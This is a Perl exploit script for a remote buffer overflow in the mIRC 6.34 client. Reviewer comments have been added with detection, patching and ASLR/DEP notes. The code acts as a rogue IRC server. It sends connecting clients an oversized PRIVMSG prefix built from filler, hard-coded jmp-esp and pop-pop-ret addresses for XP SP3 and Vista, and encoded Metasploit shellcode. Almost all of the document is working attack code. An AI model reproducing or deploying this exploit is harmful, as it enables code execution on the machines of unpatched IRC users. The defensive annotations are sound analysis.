#!/usr/bin/perl
#
#
# mIRC 6.34 Remote Buffer Overflow Exploit
# Exploit by SkD (skdrat hotmail <.> com)
# ----------------------------------------
# A day's work of debugging and looking at mIRC.
#
# Tested on Windows XP SP3 English and Windows Vista SP0.
#
# Credits to securfrog for publishing the PoC.
#
# Author has no responsibility over the damage you do with this!
#
# Note: You might change the addresses for Vista ;)
#
# ----------------------------------------
#
# Review notes
# ------------
# What the code below does: it opens a listening TCP socket on
# 127.0.0.1:<port>, waits for one client per loop iteration, sends an IRC
# 001 welcome line, then sends a single PRIVMSG line whose sender prefix
# (the text between the leading ':' and " PRIVMSG") is several hundred bytes
# of filler, hard-coded DLL addresses and an encoded payload.  The script
# plays the role of an IRC server; the affected party is the connecting
# client.
#
# Defensive takeaways:
#  * Detection: a server-to-client IRC line whose prefix is far longer than
#    any nick!user@host and contains non-printable bytes (0x90 runs,
#    high-bit bytes) is abnormal.  The complete line built here is also
#    longer than the 512-byte message limit of RFC 1459.
#  * Mitigation: run a client release newer than the 6.34 named in the
#    title.
#  * Hardening: the addresses are fixed per Windows build (see the author's
#    note about Vista above), so the technique presumably depends on system
#    DLLs loading at predictable addresses; ASLR and DEP are the relevant
#    platform controls.
#  * Exposure: the listener is bound to the loopback address, so as written
#    only a client on the same host can reach it.
#
# Code quality: there is no 'use strict' / 'use warnings', and every
# variable except $sock and $shellcode is an undeclared package global.

use IO::Socket;

# Print the banner and exit when the second argument is missing or false.
# NOTE(review): the "Use:" text shows no argument names, presumably lost
# when the page was extracted; the example passes a port and a selector.
if(!($ARGV[1]))
{
    print "\n[x] mIRC 6.34 Remote Buffer Overflow Exploit\n";
    print "[x] Exploit by SkD (skdrat@ hotmail.com)\n\n";
    print "[x] Use: mirc_exp.pl \n[x] Example: mirc_exp.pl 6667 0\n\n";
    exit;
}

# One pass per client: a fresh listening socket is created on every
# iteration and the loop never terminates on its own.
while(1)
{
    # Loopback-only listener on the port given as the first argument.
    my $sock=new IO::Socket::INET ( Listen => 1, LocalAddr => '127.0.0.1', LocalPort => $ARGV[0], Proto => 'tcp');
    # Bare die: no diagnostic is printed if the socket could not be created.
    die unless $sock;

    # Payload as described by its generator comment (CMD=calc); the bytes
    # are encoded, so they are a usable content signature only in this
    # exact form.
    # win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
    my $shellcode = "\x2b\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x1e".
    "\x95\x97\xf1\x83\xeb\xfc\xe2\xf4\xe2\x7d\xd3\xf1\x1e\x95\x1c\xb4".
    "\x22\x1e\xeb\xf4\x66\x94\x78\x7a\x51\x8d\x1c\xae\x3e\x94\x7c\xb8".
    "\x95\xa1\x1c\xf0\xf0\xa4\x57\x68\xb2\x11\x57\x85\x19\x54\x5d\xfc".
    "\x1f\x57\x7c\x05\x25\xc1\xb3\xf5\x6b\x70\x1c\xae\x3a\x94\x7c\x97".
    "\x95\x99\xdc\x7a\x41\x89\x96\x1a\x95\x89\x1c\xf0\xf5\x1c\xcb\xd5".
    "\x1a\x56\xa6\x31\x7a\x1e\xd7\xc1\x9b\x55\xef\xfd\x95\xd5\x9b\x7a".
    "\x6e\x89\x3a\x7a\x76\x9d\x7c\xf8\x95\x15\x27\xf1\x1e\x95\x1c\x99".
    "\x22\xca\xa6\x07\x7e\xc3\x1e\x09\x9d\x55\xec\xa1\x76\x65\x1d\xf5".
    "\x41\xfd\x0f\x0f\x94\x9b\xc0\x0e\xf9\xf6\xf6\x9d\x7d\x95\x97\xf1";

    print "[x] Listening on port ".$ARGV[0]."..\r\n";
    # Blocks until a client connects; the return value is not checked.
    $s=$sock->accept();
    print "[x] Got a user!\r\n";

    # Building blocks of the oversized prefix.
    $overflow = "\x41" x 307;                   # filler: 307 'A' bytes
    $overflow2 = "B" x 12;                      # filler: 12 'B' bytes
    # Hard-coded addresses, one pair per tested OS (author's annotations).
    $eip_vista = "\x66\x1c\xc2\x76";            #Normaliz.DLL pop pop ret
    $eip2_vista = "\xd3\xdb\x54\x77";           #MSFCT.DLL jmp esp
    $eip_xpsp3 = "\xd1\xfb\x92\x77";            #SETUPAPI.DLL 0x7792FBD1 pop eax pop ret
    $eip2_xpsp3 = "\xb7\x87\x9d\x77";           #SETUPAPI.DLL 0x779D87B7 jmp esp
    # NOTE(review): the author does not explain what this address is for.
    $addr = "\xb5\xb5\xfd\x7f";
    $nop_sled = "\x90" x 4;                     # four 0x90 bytes, reused as a separator
    # NOTE(review): unexplained by the author; by its name, a jump encoding.
    $jmp = "\xEB\x03\xFF\xFF";

    print "[x] Sending packets..\r\n";
    # IRC numeric 001 (welcome), presumably so the client treats the
    # session as registered before the next line arrives.
    print $s ":my_irc_server.com 001 wow :Welcome to the Internet Relay Network wow\r\n";
    # One-second pause before the second line; the reason is not stated.
    sleep(1);

    # Numeric comparison on the second argument: 1 selects the XP SP3
    # address pair, anything else the Vista pair.  The two lines differ
    # only in which address pair is embedded in the prefix.
    if($ARGV[1] == "1"){
        print $s ":".$overflow.$eip_xpsp3.$addr.$nop_sled.$eip2_xpsp3.$nop_sled.$overflow2.$jmp.$nop_sled.$shellcode.$nop_sled." PRIVMSG wow : /FINGER wow.\r\n";
    }else{
        print $s ":".$overflow.$eip_vista.$addr.$nop_sled.$eip2_vista.$nop_sled.$overflow2.$jmp.$nop_sled.$shellcode.$nop_sled." PRIVMSG wow : /FINGER wow.\r\n";
    }
    print "[x] Check it out!\r\n";
    # The accepted socket in $s is never closed explicitly.
}